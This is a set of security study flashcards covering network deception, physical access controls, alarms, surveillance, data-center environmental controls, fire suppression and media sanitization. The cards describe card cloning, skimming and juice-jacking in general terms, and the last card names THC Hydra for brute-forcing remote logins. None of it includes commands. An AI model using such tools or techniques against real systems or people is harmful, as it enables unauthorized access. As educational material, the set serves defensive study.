Disruption Strategies

Definition
  • Using bogus DNS entries to list multiple hosts that do not exist.
  • Configuring a web server with multiple decoy directories or dynamically generated pages to slow down scanning.
  • Using port triggering or spoofing to return fake telemetry data when a host detects port scanning activity. This will result in multiple ports being falsely reported as open and will slow down the scan. Telemetry can refer to any type of measurement or data returned by remote scanning. Similar fake telemetry could be used to report IP addresses as up when they are not, for instance.
  • Using a DNS sinkhole to route suspect traffic to a different network, such as a honeynet, where it can be analyzed.
Term
fake telemetry 
Definition

Deception strategy that returns spoofed data in response to network probes.

 

Term
DNS sinkhole  
Definition

Temporary DNS record that redirects malicious traffic to a controlled IP address.

 

Term
Physical access controls 
Definition

Controls that restrict, detect, and monitor access to specific physical areas or assets through measures such as physical barriers, physical tokens, or biometric access controls.

 

Term

Physical access controls 

Physical access controls depend on the same access control fundamentals as network or operating system security:

Definition

§  Authenticationcreate access lists and identification mechanisms to allow approved persons through the barriers.


§ 
Authorizationcreate barriers around a resource so that access can be controlled through defined entry and exit points.

§  Accountingkeep a record of when entry/exit points are used and detect security breaches.

Term
industrial camouflage 
Definition

Methods of disguising the nature and purpose of buildings or parts of buildings.

 

Term

Barricades  

Definition
A barricade is something that prevents access. As with any security system, no barricade is completely effective; a wall may be climbed or a lock may be picked, for instance. The purpose of barricades is to channel people through defined entry and exit points. 
Term

Entry/Exit Points 

Definition
Each entry point should have an authentication mechanism so that only authorized persons are allowed through. Effective surveillance mechanisms ensure that attempts to penetrate a barricade by other means are detected.
Term

Fencing 

Definition

The exterior of a building may be protected by fencing. Security fencing needs to be transparent (so that guards can see any attempt to penetrate it), robust (so that it is difficult to cut), and secure against climbing (which is generally achieved by making it tall and possibly by using razor wire). Fencing is generally effective, but the drawback is that it gives a building an intimidating appearance. Buildings that are used by companies to welcome customers or the public may use more discreet security methods.

Term

Lighting

Definition

Security lighting is enormously important in contributing to the perception that a building is safe and secure at night. Well-designed lighting helps to make people feel safe, especially in public areas or enclosed spaces, such as parking garages. Security lighting also acts as a deterrent by making intrusion more difficult and surveillance (whether by camera or guard) easier. The lighting design needs to account for overall light levels, the lighting of particular surfaces or areas (allowing cameras to perform facial recognition, for instance), and avoiding areas of shadow and glare.

Term
proximity reader  
Definition

Scanner that reads data from an RFID or NFC tag when in range.

 

Term
turnstile 
[image]
Definition

A type of gateway that only allows one person through at a time.

 

Term
mantrap 
[image]
Definition

 A mantrap is where one gateway leads to an enclosed space protected by another barrier.

Term
Cable locks
[image]
Definition

Devices can be physically secured against theft using cable ties and padlocks. Some systems also feature lockable faceplates, preventing access to the power switch and removable drives.

 

Term
Card cloning 
Definition

this refers to making one or more copies of an existing card. A lost or stolen card with no cryptographic protections can be physically duplicated. Card loss should be reported immediately so that it can be revoked and a new one issued. If there were a successful attack, it might be indicated by use of a card in a suspicious location or time of day.

Term
Skimming
Definition

Duplicating a smart card by reading (skimming) the confidential data stored on it.

this refers to using a counterfeit card reader to capture card details, which are then used to program a duplicate. Some types of proximity cards can quite easily be made to transmit the credential to a portable RFID reader that a threat actor could conceal on his or her person. Skimmers installed on public readers, such as ATM machines, can be difficult to spot. 

 

Term
USB data blocker 
Definition

Hardware plug to prevent malicious data transfer when a device is plugged into a USB charging point.


Malicious USB charging cables and plugs are also a widespread problem. As with card skimming, a device may be placed over a public charging port at airports and other transit locations. A USB data blocker can provide mitigation against these juice-jacking attacks by preventing any sort of data transfer when the smartphone or laptop is connected to a charge point

Term
Circuit Alarm
Definition

a circuit-based alarm sounds when the circuit is opened or closed, depending on the type of alarm. This could be caused by a door or window opening or by a fence being cut. A closed-circuit alarm is more secure because an open circuit alarm can be defeated by cutting the circuit.

Term
Motion detection 
Definition

a motion-based alarm is linked to a detector triggered by any movement within an area (defined by the sensitivity and range of the detector), such as a room. The sensors in these detectors are either microwave radio reflection (similar to radar) or passive infrared (PIR), which detect moving heat sources.

Term
Noise detection 
Definition

an alarm triggered by sounds picked up by a microphone. Modern AI-backed analysis and identification of specific types of sound can render this type of system much less prone to false positives.

Term
Proximity 
Definition

radio frequency ID (RFID) tags and readers can be used to track the movement of tagged objects within an area. This can form the basis of an alarm system to detect whether someone is trying to remove equipment.

Term
Duress 
Definition

this type of alarm is triggered manually by staff if they come under threat. There are many ways of implementing this type of alarm, including wireless pendants, concealed sensors or triggers, and DECT handsets or smartphones. Some electronic entry locks can also be programmed with a duress code that is different from the ordinary access code. This will open the gateway but also alert security personnel that the lock has been operated under duress.

Term
SECURITY GUARDS 
Definition

Surveillance is typically a second layer of security designed to improve the resilience of perimeter gateways. Surveillance may be focused on perimeter areas or within security zones themselves. Human security guards, armed or unarmed, can be placed in front of and around a location to protect it. They can monitor critical checkpoints and verify identification, allow or disallow access, and log physical entry events. They also provide a visual deterrent and can apply their own knowledge and intuition to potential security breaches. The visible presence of guards is a very effective intrusion detection and deterrence mechanism, but is correspondingly expensive. It also may not be possible to place security guards within certain zones because they cannot be granted an appropriate security clearance. Training and screening of security guards is imperative.

Term
CCTV (closed circuit television)  
Definition

Installation of video cameras to supply security monitoring data to a centralized management station.

 

Term
Motion recognition 
Definition
the camera system might be configured with gait identification technology. This means that the system can generate an alert when anyone moves within sight of the camera and the pattern of their movement does not match a known and authorized individual.
Term
Object detection 
Definition
the camera system can detect changes to the environment, such as a missing server, or unknown device connected to a wall port.
Term
Robot sentries  
Definition

A remote-controlled or autonomous robot capable of patrolling site premises or monitoring gateways.

surveillance systems (and in some cases weapon systems) can be mounted on a wholly or partially autonomous robot.

 

Term

Reception Personnel and Visitor Logs

Definition

An access list held at the reception area for each secure gateway records who is allowed to enter. An electronic lock may be able to log access attempts or a reception staff can manually log movement. At the lowest end, a sign-in and sign-out sheet can be used to record authorized access. Visitor logging requirements will vary depending on the organization, but should include at least the name and company being represented, date, time of entry and departure, reason for visiting, and contact within the organization.

Term

Two-Person Integrity/Control 

 

Definition

Reception areas for high-security zones might be staffed by at least two people at all times, providing integrity for entry control and reducing the risk of insider threat.

Term

ID Badges

 

Definition

A photographic ID badge showing name and (perhaps) access details is one of the cornerstones of building security. Anyone moving through secure areas of a building should be wearing an ID badge; anyone without an ID badge should be challenged. Color-coding could be used to make it obvious to which zones a badge is granted access.

Term

Air Gap/Demilitarized Zone

Definition

A type of network isolation that physically separates a network from all other networks.

An air gapped host is one that is not physically connected to any network. Such a host would also normally have stringent physical access controls, such as housing it within a secure enclosure, validating any media devices connected to it, and so on.

 

An air gap within a secure area serves the same function as a demilitarized zone. It is an empty area surrounding a high-value asset that is closely monitored for intrusions. As well as being disconnected from any network, the physical space around the host makes it easier to detect unauthorized attempts to approach the asset. Security policies should prevent any unauthorized computing hosts or storage media from being carried into the DMZ.

 

Term

Safes 

Definition

Portable devices and media (backup tapes or USB media storing encryption keys, for instance) may be stored in a safe. Safes can feature key-operated or combination locks but are more likely to come with electronic locking mechanisms. Safes can be rated to a particular cash value for the contents against various international grading schemes. There are also fire safes that give a certain level of protection against exposure to smoke and flame and to water penetration (from fire extinguishing efforts).

Term
vault
Definition

A secure room with walls and gateway hardened against physical assault.

vault is a room that is hardened against unauthorized entry by physical means, such as drilling or explosives. A vault is expensive, but may be considered necessary for mission critical assets that need to be very securely air gapped, such as the root server for a commercial CA.

 

Term
PROTECTED DISTRIBUTION  
Definition

A physically secure cabled network is referred to as protected cable distribution or as a protected distribution system (PDS). There are two principal risks:

 An intruder could attach eavesdropping equipment to the cable (a tap).

 An intruder could cut the cable (Denial of Service).

A hardened PDS is one where all cabling is routed through sealed metal conduit and subject to periodic visual inspection. Lower-grade options are to use different materials for the conduit (plastic, for instance). Another option is to install an alarm system within the cable conduit, so that intrusions can be detected automatically.

 

Term
 Faraday Cage.
Definition

A wire mesh container that blocks external electromagnetic fields from entering into the container.

It is possible to install communications equipment within a shielded enclosure, known as a Faraday Cage. The cage is a charged conductive mesh that blocks signals from entering or leaving the area. The risk of eavesdropping from leakage of electromagnetic signals was investigated by the US DoD who defined TEMPEST (Transient Electromagnetic Pulse Emanation Standard) as a means of shielding the signals. 

 

Term
shielding  
Definition

A method of counteracting signal leakage from network media (and thus eavesdropping); it can be applied to a variety of items, from a twisted-pair cable up to an entire room or building.

 

Term
HVAC (Heating, Ventilation, Air Conditioning)
Definition

Building control systems maintain an optimum heating, cooling, and humidity level working environment for different parts of the building.

 

For computer rooms and data centers, a thermostatically controlled environment is usually kept at a temperature of around 20-22°C (68-70°F) and relative humidity of 50%. The heat generated by equipment per hour is measured in British Thermal Units (BTU) or kilowatts (KW). 1 KW is 3412 BTU. To calculate the cooling requirement for an air conditioning system, multiply the wattage of all equipment in the room (including lighting) by 3.41 to get the BTU/hour. If the server room is occupied (unlikely in most cases), add 400 BTU/person. The air conditioner's BTU-rating must exceed this total value.

Term
hot aisle/cold aisle[image]
Definition

Arrangement of server racks to maximize the efficiency of cooling systems.

A data center or server room should be designed in such a way as to maximize air flow across the server or racks. If multiple racks are used, install equipment so that servers are placed back-to-back not front-to-back, so that the warm exhaust from one bank of servers is not forming the air intake for another bank. This is referred to as a hot aisle/cold aisle arrangement. In order to prevent air leaks from the hot aisle to the cold aisle, ensure that any gaps in racks are filled by blank panels and use strip curtains or excluders to cover any spaces above or between racks.

Term
(Electromagnetic Interference [EMI]) 
Definition

A disruption of electrical current that occurs when a magnetic field around one electrical circuit interferes with the signal being carried on an adjacent circuit.

 

Term
Fire suppression 
Definition

Fire detection and suppression systems are mandatory in most public and private commercial premises. Water-based fire suppression is a risk to computer systems, both in the event of fire and through the risk of flood. Alternatives include dry pipe and gas-based systems.

Fire suppression systems work on the basis of the fire triangle. The fire triangle works on the principle that a fire requires heat, oxygen, and fuel to ignite and burn. Removing any one of those elements provides fire suppression (and prevention).

 

Term
Dry-pipe 
Definition
these are used in areas where freezing is possible; water only enters this part of the system if sprinklers elsewhere are triggered.
Term
Pre-action 
Definition
a pre-action system only fills with water when an alarm is triggered; it will then spray when the heat rises. This gives protection against accidental discharges and burst pipes and gives some time to contain the fire manually before the sprinkler operates.
Term
Halon 
Definition
gas-based systems have the advantage of not short circuiting electrical systems and leaving no residue. Up until a few years ago, most systems used Halon 1301. The use of Halon has been banned in most countries as it is ozone depleting, though existing installations have not been replaced in many instances and can continue to operate legally. 
Term
Clean agent 
Definition
alternatives to Halon are referred to as "clean agent." As well as not being environmentally damaging, these gases are considered nontoxic to humans. Examples include INERGEN (a mixture of CO₂, argon, and nitrogen), FM-200/HFC-227, and FE-13. The gases both deplete the concentration of oxygen in the area (though not to levels dangerous to humans) and have a cooling effect. CO₂ can be used too, but it is not safe for use in occupied areas. 
Term
Media sanitization  & remnant removal
Definition

The process of thoroughly and completely removing data from a storage medium so that file remnants cannot be recovered.


 refer to erasing data from hard drives, flash drives/SSDs, tape media, CD and DVD ROMs before they are disposed of or put to a different use. Paper documents must also be disposed of securely. Data remnants can be dealt with either by destroying the media or by purging it (removing the confidential information but leaving the media intact for reuse).

Term
 Data remnants 
Definition

Leftover information on a storage medium even after basic attempts have been made to remove that data.

 

Term
Burning 
Definition
incineration is an effective method for all media types, so long as it is performed in a furnace designed for media sanitization. Municipal incinerators may leave remnants.
Term
Shredding and pulping 
Definition

most media can be shredded. For paper documents, shredders are rated by the size of the remnants they reduce a sheet to. Level 1 is 12mm strips, while Level 6 is 0.8x4mm particles. Pulping the shredded remains with water or incinerating them provides an extra measure of protection. Some office shredders can destroy optical media too. Industrial shredders can destroy hard drives and flash drives.

Term
Pulverizing
Definition

this refers to shredding and crushing a media device to powder (2mm particle size or less). Simply smashing a hard drive with a hammer can leave a surprising amount of recoverable data, so pulverization using industrial machinery is more secure.

Term
Degaussing 
Definition

The process of rendering a storage drive inoperable and its data unrecoverable by eliminating the drive's magnetic charge.

 exposing a hard disk to a powerful electromagnet disrupts the magnetic pattern that stores the data on the disk surface. Note that SSDs, flash media, and optical media cannot be degaussed, only hard disk drives.

 

Term
Secure Erase (SE) 
Definition

A method of sanitizing a drive using the ATA command set.

 

Term
hdparm
Definition
This command can be invoked using a drive/array utility or the hdparm Linux utility. On HDDs, this performs a single pass of zero-filling.
Term

 

Instant Secure Erase (ISE) 

Definition
HDDs and SSDs that are self-encrypting drives (SEDs) support another option, invoking a SANITIZE command set in SATA and SAS standards from 2012 to perform a crypto erase. Drive vendors implement this as Instant Secure Erase (ISE). With an SED, all data on the drive is encrypted using a media encryption key. When the erase command is issued, the MEK is erased, rendering the data unrecoverable. FIPS140-2 or FIPS140-3 validation provides assurance that the cryptographic implementation is strong.
Term
 crypto erase 
Definition

A method of sanitizing a self-encrypting drive by erasing the media encryption key.

 

Term

THC Hydra

Definition
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more.
Supporting users have an ad free experience!